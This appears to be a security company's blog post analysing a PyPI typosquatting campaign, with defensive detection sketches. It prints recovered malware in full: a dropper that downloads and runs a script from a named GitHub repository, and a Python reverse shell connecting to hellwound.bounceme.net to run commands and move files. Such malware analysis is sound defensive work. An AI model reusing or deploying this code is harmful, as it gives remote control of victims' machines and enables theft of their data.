Disrupting a PyPI Software Supply Chain Threat Actor
Software supply chain attacks in the open-source ecosystem are frequent and pervasive. The cost of publishing a malicious package is low, while the payoff could be high - yielding keys to infrastructure, bank credentials, or cryptocurrency.
Phylum ingests all packages as they are published into these open-source ecosystems and analyzes the source files (over half a billion source files this year) to determine if they exhibit any indications of maliciousness.
Performing analysis at this scale allows us to make determinations about the behaviors of software supply chain threat actors over time. As these threat actors must work in public (given how open source works), it allows us to gain insight into their evolving tactics.
This is an overview of how we tracked an attacker (internally dubbed Gooberworm), monitored their development in real-time, and disrupted their campaign.
A burgeoning threat
On November 15, 2022, Phylum's system began notifying us of malicious packages being published to PyPI. Our automation capability immediately protected our users from this threat, and we published our findings to Twitter:
⚠️ #Python Malware: colurama
Appears to be associated with the attacks @Phylum_IO previously reported on! #pypi #malware #python3 #opensource (November 15, 2022)
As the day went on, the list of published packages continued to grow:
colurama
coloroma
colorarise
randomized
msfpath
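Two of these names, colurama and coloroma, sit a single character away from the widely used colorama package. A minimal sketch of how such near-miss names could be flagged is shown here; it is not Phylum's detection logic, and the `POPULAR` list, the `likely_typosquat` helper, and the 0.8 threshold are all assumptions chosen for illustration.

```python
from difflib import SequenceMatcher

# Hypothetical list of well-known package names. A real check would use a much
# larger list, for example the most-downloaded projects on PyPI.
POPULAR = ("colorama", "requests", "numpy")


def likely_typosquat(name, popular=POPULAR, threshold=0.8):
    """Return the popular package that `name` closely resembles, or None."""
    candidate = name.lower()
    if candidate in popular:
        return None  # exact match: this is the real package, not a lookalike
    for known in popular:
        # ratio() is 1.0 for identical strings and falls as they diverge.
        if SequenceMatcher(None, candidate, known).ratio() >= threshold:
            return known
    return None


for pkg in ("colurama", "coloroma", "colorarise", "randomized", "msfpath"):
    print(pkg, "->", likely_typosquat(pkg))
```

A similarity check like this only catches lookalike names. Packages such as msfpath resemble nothing popular, so name matching has to be paired with analysis of the package contents.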
Buried in each of these, as one might expect, was a bunch of obfuscated Python:
Many layers of obfuscation
The obfuscation here is comically bad (I’m sensing a pattern here). Replacing the exec with a print reveals the next layer.
Here is yet another layer, this time using a different sort of obfuscation. Unrolling it, however, works exactly the same way: replace the exec with a print.
In the third layer, the actor tried to be a bit trickier by compiling the resulting source into Python bytecode. Replacing the last line with print(oIoeaTEAcvpae) gets us the underlying source:
```python
import platform
import subprocess

if platform.system().startswith("Linux"):
    try:
        with open('/tmp/file.py', 'w') as f:
            f.write("import os \nimport subprocess \nfrom pathlib import Path \nfrom urllib import request \n")
            f.write("hello = os.getlogin() \n")
            f.write("PATH = '/home/' + hello + '/.msfdb.d'\n")
            f.write("PAT = '/tmp/file.py'\n")
            f.write("isExist = os.path.exists(PATH) \n")
            f.write("if not isExist:\n")
            f.write(" os.makedirs(PATH) \n")
            f.write("if Path(PATH).is_file(): \n")
            f.write(" print("") \n")
            f.write("else: \n")
            f.write(" remote_url = 'https://raw.githubusercontent.com/gobiwound/ab32/main/naopcEaovaeAvocpa.sh' \n")
            f.write(" local_file = PATH+'/msfdb.sh' \n")
            f.write(" request.urlretrieve(remote_url, local_file) \n")
            f.write(" subprocess.call(\"bash /home/$USER/.msfdb.d/msfdb.sh\", shell=True) \n")
            f.write(" if Path(PAT).is_file(): \n")
            f.write(" try:\n os.remove(PAT)\n")
            f.write(" except:\n print()")
    except FileNotFoundError:
        print("")
    subprocess.call("python3 /tmp/file.py &", shell=True)
else:
    print("")
```
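The exec-to-print substitution used on the earlier layers can be sketched on a harmless stand-in. The base64 wrapping below is an assumption made purely for illustration, since the encodings the actor actually used are not reproduced here, and `defang` and `reveal` are hypothetical helper names.

```python
import base64
import contextlib
import io
import re


def defang(source):
    """Swap every exec( call for print( so a layer prints its payload instead of running it."""
    return re.sub(r"\bexec\s*\(", "print(", source)


def reveal(source):
    """Run a defanged layer and capture the text it would otherwise have executed."""
    buffer = io.StringIO()
    with contextlib.redirect_stdout(buffer):
        # The code around the original exec still runs, so real samples
        # belong in a disposable sandbox, never on a workstation.
        exec(defang(source), {})
    return buffer.getvalue().rstrip("\n")


# Harmless stand-in for one obfuscation layer (base64 is an assumed encoding).
payload = 'print("inner payload")'
encoded = base64.b64encode(payload.encode()).decode()
layer = f'import base64\nexec(base64.b64decode("{encoded}").decode())'

print(reveal(layer))
```

Applying `reveal` repeatedly to its own output would peel successive layers, provided each one ends in a plain exec call.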
The recovered dropper fetches a script from GitHub, saves it locally as msfdb.sh, and executes it. That script, too, is heavily obfuscated, which makes it somewhat difficult to reason about. Helpfully though, the actor was kind enough to store everything in a Git repo that Phylum could access. At the time of publishing, the GitHub repo is still accessible at https://github.com/gobiwound/ab32.
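The file system paths hard-coded in the recovered dropper double as simple indicators of compromise. The following is a minimal sketch of a check for them, assuming a Linux host. The `find_dropper_artifacts` helper is hypothetical. Note that /tmp/file.py is a generic name, so a hit on that path alone is weak evidence.

```python
from pathlib import Path


def find_dropper_artifacts(home, tmp="/tmp"):
    """Return the paths used by the recovered dropper that exist under `home` and `tmp`."""
    candidates = [
        Path(tmp) / "file.py",                 # staging script the dropper writes
        Path(home) / ".msfdb.d",               # hidden directory it creates
        Path(home) / ".msfdb.d" / "msfdb.sh",  # shell script fetched from GitHub
    ]
    return [str(path) for path in candidates if path.exists()]


hits = find_dropper_artifacts(Path.home())
print("\n".join(hits) if hits else "no known artifacts found")
```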
Watching the attacker work in real-time
It was around this time that we decided to report the repo to GitHub in hopes that we would cut down another component of this actor’s attack infrastructure.
We also witnessed the attacker updating the obfuscation for their payload in real time, continuing to hone their attack for maximum efficacy.
By this time, Phylum had already ruined the campaign, but the attacker likely didn’t realize just how burned they were. It was time to let them know. For posterity, we cloned the existing Git repo and created a new issue in the attacker’s GitHub repository.
The attacker panics
The attacker continued their work for the next few hours, blissfully unaware of our newly minted issue.
When the actor did finally notice, they did what we can only assume was the first thing that came to mind: push a commit deleting all of the files from the repo. Unfortunately for them, they appear to be unaware that pushing a commit that removes files doesn’t remove those files from the Git history.
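To illustrate why a deleting commit hides nothing, here is a minimal sketch that lists deleted files from a clone's history and reads one back. It is not a record of the commands Phylum ran. `parse_deletions` and `recover` are hypothetical helpers, while the git options themselves (`--diff-filter=D`, `--name-only`, `--pretty=format:%H`, and `git show <commit>^:<path>`) are standard.

```python
import re
import subprocess

# Lists every commit that deleted files, followed by the paths it removed.
LIST_DELETIONS = ["git", "log", "--diff-filter=D", "--name-only", "--pretty=format:%H"]

# Full commit hashes are 40 hex characters (64 in SHA-256 repositories).
_HASH = re.compile(r"^(?:[0-9a-f]{40}|[0-9a-f]{64})$")


def parse_deletions(log_output):
    """Map each deleting commit hash to the list of paths it removed."""
    deleted = {}
    current = None
    for line in log_output.splitlines():
        line = line.strip()
        if not line:
            continue
        if _HASH.match(line):
            current = line
            deleted[current] = []
        elif current is not None:
            deleted[current].append(line)
    return deleted


def recover(repo, commit, path):
    """Read a deleted file from the parent of the commit that removed it."""
    result = subprocess.run(
        ["git", "-C", repo, "show", f"{commit}^:{path}"],
        check=True, capture_output=True, text=True,
    )
    return result.stdout
```

Running `LIST_DELETIONS` inside a clone and passing its output to `parse_deletions` yields the commits to hand to `recover`. Truly removing a file requires rewriting history, and even that does nothing about clones others have already made.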
In an attempt to further hide their tracks, the actor also tried to clean up the issue we created. Phylum was one step ahead and ensured that an issue title change occurred, which prevented the attacker from completely removing all references to malware.
We can only assume “k” is the actor's response to us after we told them to “knock off” publishing malware on PyPI. Though we don’t expect that our attacker friend has any intentions of doing so.
Unrolling the remaining obfuscation
The question remains, though: what does the obfuscated bash script naopcEaovaeAvocpa.sh in the Git repo do? Fortunately for us, the attacker committed the full history for this file, allowing us to get a good sense of the underlying functionality.
The attacker has contributed a few commits updating the obfuscation methods for this file. If we go back to the earliest commit touching this file, we find a file rename: from
Surely the attacker wasn’t dumb enough to commit the original file completely unobfuscated… right? Spoiler alert: they were.
At a high level, the bash script checks whether msfpath exists on the system. If it doesn’t, the package is pip installed. The script then attempts to import msfpath and execute it.
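Because the script pulls in msfpath with pip, one quick host-side check is to compare the installed distributions against the package names reported in this campaign. A minimal sketch follows, assuming Python 3.8 or later. The `flag_reported` and `installed_names` helpers are hypothetical, and a name on this list could in principle be re-registered later by an unrelated author.

```python
import re
from importlib import metadata

# Package names reported earlier in this post.
REPORTED = {"colurama", "coloroma", "colorarise", "randomized", "msfpath"}


def normalize(name):
    """Normalize a project name the way PyPI does (PEP 503)."""
    return re.sub(r"[-_.]+", "-", name).lower()


def flag_reported(names, reported=REPORTED):
    """Return the sorted, normalized names that appear on the reported list."""
    wanted = {normalize(item) for item in reported}
    return sorted({normalize(name) for name in names} & wanted)


def installed_names():
    """List the names of distributions installed in the current environment."""
    found = (dist.metadata["Name"] for dist in metadata.distributions())
    return [name for name in found if name]


print(flag_reported(installed_names()))
```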
msfpath contains additional obfuscation, but using the tried and true "replace eval with print" approach, we were able to get back to the original Python:
```python
import socket
import json
import subprocess
import time
import os

def reliable_send(data):
    jsondata = json.dumps(data)
    s.send(jsondata.encode())

def reliable_recv():
    data = ''
    while True:
        try:
            data = data + s.recv(1024).decode().rstrip()
            return json.loads(data)
        except ValueError:
            continue

def download_file(file_name):
    f = open(file_name, 'wb')
    s.settimeout(1)
    chunk = s.recv(1024)
    while chunk:
        f.write(chunk)
        try:
            chunk = s.recv(1024)
        except socket.timeout as e:
            break
    s.settimeout(None)
    f.close()

def upload_file(file_name):
    f = open(file_name, 'rb')
    s.send(f.read())

def connection():
    while True:
        time.sleep(4)
        try:
            s.connect(('hellwound.bounceme.net', 6003))
            shell()
            s.close()
            break
        except:
            connection()

def shell():
    while True:
        command = reliable_recv()
        if command == 'quit':
            break
        elif command == 'background':
            pass
        elif command == 'help':
            pass
        elif command == 'clear':
            pass
        elif command[:3] == 'cd ':
            os.chdir(command[3:])
        if command[:3] == 'res ':
            reliable_send(True)
            break
        elif command[:6] == 'upload':
            download_file(command[7:])
        elif command[:8] == 'download':
            upload_file(command[9:])
        elif command[:7] == 'sendall':
            subprocess.Popen(command[8:], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,stdin = subprocess.PIPE)
        else:
            execute = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,stdin=subprocess.PIPE)
            result = execute.stdout.read() + execute.stderr.read()
            result = result.decode()
            reliable_send(result)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

def catc():
    try:
        connection()
    except KeyboardInterrupt:
        quit()

catc()
```
The script makes a connection to hellwound.bounceme.net (a No-IP DDNS hostname). It receives data from this server and, depending on the command received, takes action on the infected machine.
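Behaviors like these (an outbound socket connection, shell commands run through subprocess, layers of exec) can be surfaced without ever running the code. The sketch below is a deliberately crude heuristic built on Python's standard `ast` module. It is an illustration only, not Phylum's analysis engine, and `suspicious_calls` is a hypothetical helper. Patterns this broad also match plenty of legitimate code, so the output is a prompt for review rather than a verdict.

```python
import ast


def suspicious_calls(source):
    """Return sorted labels for risky call patterns found in `source`."""
    findings = set()
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
        if isinstance(func, ast.Name) and func.id in {"exec", "eval"}:
            findings.add(f"dynamic execution via {func.id}()")
        elif isinstance(func, ast.Attribute):
            if func.attr == "connect":
                findings.add("outbound connect() call")
            # Look for a literal shell=True keyword argument on any method call.
            shell_true = any(
                kw.arg == "shell"
                and isinstance(kw.value, ast.Constant)
                and kw.value.value is True
                for kw in node.keywords
            )
            if shell_true:
                findings.add(f"{func.attr}() with shell=True")
    return sorted(findings)


# Inert sample: the source is only parsed, never executed.
sample = (
    "import socket, subprocess\n"
    "s = socket.socket()\n"
    "s.connect(('example.invalid', 6003))\n"
    "subprocess.Popen('id', shell=True)\n"
)
print(suspicious_calls(sample))
```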
The attacker’s intentions are now clear: infect as many machines as possible by way of infected Python packages, and build an army of attacker-controlled bots.
And what about cronjob.out that appears in the Git repo? What’s the purpose of this file in this whole scheme? We’ll be publishing a follow-up post outlining how one of our engineers busted out Ghidra to make sense of this file.
This is not the end
At this point, the attacker's malicious packages have been removed. We reported their GitHub repository, reported their host to No-IP, and publicly shamed them. Software supply chain attack thwarted!
While we successfully disrupted this campaign, rest assured this is not the last time we’ll see this threat actor. They’ll be back with updated TTPs, targeting software engineers with innocuous packages that subtly insert malware onto developer machines. The attackers are numerous and persistent; a true software Hydra - cut off the head of one attacker and two more attackers take their place.
Thus we, as engineers, must remain vigilant, checking each piece of software that we pull into our builds in an automated fashion to block threats at the source.
With this in mind, we’ll leave all the attackers - who I’m sure are reading this - with the following: